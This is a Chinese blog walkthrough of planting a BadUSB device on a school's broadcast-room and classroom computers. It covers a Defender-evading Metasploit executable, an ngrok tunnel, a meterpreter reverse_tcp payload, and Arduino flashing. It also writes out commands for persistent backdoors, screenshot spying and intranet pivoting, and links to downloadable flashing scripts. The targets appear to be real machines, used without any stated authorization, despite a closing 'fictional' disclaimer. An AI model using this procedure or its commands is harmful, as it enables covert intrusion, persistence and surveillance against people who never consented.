携Badusb进校园的系列测试

访客 279 0
本文来源:携Badusb进校园的系列测试

原创 Scan 合天智汇

本文所用到的工具:

  • Badusb
  • Ngrok
  • Arduino
  • Msfconsole
  • Msfvenom
  • 迷你相机

0x01蓄谋已久的前言

每次上楼时,都能看见广播室门开得非常宽

携Badusb进校园的系列测试-第1张图片-网盾网络安全培训

但这不是重点,重点是里面的电脑(WindowsXP),电脑桌面上是LED大屏幕的编辑软件。

携Badusb进校园的系列测试-第2张图片-网盾网络安全培训

二楼有个网络管理箱并由管道内的网线传输到每个教室的多媒体(Windows10)。

携Badusb进校园的系列测试-第3张图片-网盾网络安全培训

看看兜里的Badusb,突然就散发出了浓浓的香味,哧溜~~~。

俗话说“艺高人胆大”,但吾也要:武艺不高强,菜鸟也先飞!

携Badusb进校园的系列测试-第4张图片-网盾网络安全培训

0x02分析并整理收集到的信息

主机

系统

杀毒软件

网络状态

广播室

Windows XP

不详

不详

多媒体

Windows 10

Defender、360

正常

而且我们从二楼的网络管理箱分支网线的管道可推断出二楼所有教师的多媒体属于同一内网。我们在烧录代码的时候,就要根据不同的系统版本,网络状态,杀毒软件等因素来进行烧录。为什么说广播室的具体信息我们获取不到呢?因为“可远观,而不可亵玩焉。”

携Badusb进校园的系列测试-第5张图片-网盾网络安全培训

0x03部署Payload及规避模块到Ngrok

首先我们使用规避模块生成一个WindowsEXE文件来规避WindwosDefender程序,操作如下:

showevasuib

携Badusb进校园的系列测试-第6张图片-网盾网络安全培训

携Badusb进校园的系列测试-第7张图片-网盾网络安全培训

携Badusb进校园的系列测试-第8张图片-网盾网络安全培训

接着run可以看到生成的FILENAME(文件名是随机的)

当然也可以自定义SetFILENAME 文件名即可

生成的文件保存到了

/root/.msf4/local/yZdsypg.exe

接下来我们来部署反弹环境,在这里来注册一个账户

登录后来到后台页面点击

携Badusb进校园的系列测试-第9张图片-网盾网络安全培训

当然也有免费的隧道,不过网速较慢,根据自己的情况而定!

携Badusb进校园的系列测试-第10张图片-网盾网络安全培训

接着我们点击立即购买,会跳转到隧道配置的页面,如图:

携Badusb进校园的系列测试-第11张图片-网盾网络安全培训

使用ping服务器地址命令,找到IP地址。

携Badusb进校园的系列测试-第12张图片-网盾网络安全培训

接着我们打开刚解压下来的文件夹

输入./sunnyclientid 填写你的隧道ID

携Badusb进校园的系列测试-第13张图片-网盾网络安全培训

出现这个界面就代表隧道连接成功!

携Badusb进校园的系列测试-第14张图片-网盾网络安全培训

接着我们用Msfvenom生成可执行文件,代码如下

携Badusb进校园的系列测试-第15张图片-网盾网络安全培训

注:如果是64位系统,Payload则更改为:windows/x64/meterpreter/reverse_tcp对于小白很陌生带两个值是可以实现自动迁移进程的功能,关闭其中一进程并不影响另一进程。

-k选项并不适用于所有模板,请提前做好测试。

实验:MSFvenom实践

实验:MSFvenom实践(合天网安实验室)

(通过该实验了解msfvenom和metasploit的用法)

携Badusb进校园的系列测试-第16张图片-网盾网络安全培训

0x04安装Arduino

首先我们打开arduino安装包

携Badusb进校园的系列测试-第17张图片-网盾网络安全培训

携Badusb进校园的系列测试-第18张图片-网盾网络安全培训

携Badusb进校园的系列测试-第19张图片-网盾网络安全培训

携Badusb进校园的系列测试-第20张图片-网盾网络安全培训

携Badusb进校园的系列测试-第21张图片-网盾网络安全培训

完成了安装。

配置如下:

携Badusb进校园的系列测试-第22张图片-网盾网络安全培训

完成安装。

携Badusb进校园的系列测试-第23张图片-网盾网络安全培训

0x05烧录代码

携Badusb进校园的系列测试-第24张图片-网盾网络安全培训

携Badusb进校园的系列测试-第25张图片-网盾网络安全培训

更多代码在文章底部有相关信息,不要着急!

编译好之后我们直接上传即可完成烧录,直接点击上传可以检查编译并上传。

0x06Shell快到碗里来

携Badusb进校园的系列测试-第26张图片-网盾网络安全培训

让基友给我代插烧鹅:

携Badusb进校园的系列测试-第27张图片-网盾网络安全培训

如图:

携Badusb进校园的系列测试-第28张图片-网盾网络安全培训

我们已经获取到了Meterpreter会话,现在我们可以为所欲为了!

为了防止亡羊补牢,要一劳永逸,我们先添加一个持久后门,命令如下:

runpersistence -X -i 5 -p 端口-rIP

or

runmetsvc

第二种方法直接监听即可,具体方法找谷哥和度娘。

携Badusb进校园的系列测试-第29张图片-网盾网络安全培训

附带一张屏幕截图:

screenshot

携Badusb进校园的系列测试-第30张图片-网盾网络安全培训

打开偷窥一下:

携Badusb进校园的系列测试-第31张图片-网盾网络安全培训

实验:Metasploit制作木马后门

实验:Metasploit制作木马后门(合天网安实验室)

(通过实验来亲手使用meterpreter留nc后门)

0x07内网漫游

携Badusb进校园的系列测试-第32张图片-网盾网络安全培训

查看子网:runget_local_subnets

添加路由:routeadd 子网掩码 会话id

查看路由:routeprint

自动化添加路由:loadauto_add_route

携Badusb进校园的系列测试-第33张图片-网盾网络安全培训

额.......好吧得退出meterpreter会话,因不可描述因素,就这样吧。

提示得运行一个Post模块,并且添加参数,大家明白就好。

设置完毕后接下来就看自己的操作了,

广播室也被搞定,也是因不可描述规章制度等原因不再继续。正文到此结束。

总结:

1.要提前知晓操作系统。

2.根据不同的系统要构造不同的Payload。

3.采用多种可执行后缀(bat、exe、docx)。

4.获取Shell要第一时间添加后门。

5.不推荐使用Ngrok,自行百度其他平台,但使用方法基本一致。

6.添加完路由如果有网络异常状态,则删除路由条目。

代码以烧录器整理**如下:

(均来自互联网、适用与否请提前在虚拟机测试)

打开烧录脚本软件,点击文件--打开即可。

链接:https://pan.baidu.com/s/17UCyKosBkjCRb7IBfxfdPg

提取码:btmz

声明:本文仅供参考,内容仅为虚构,代码以及使用方法切勿使用于非法用途!


标签: 合天智汇

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~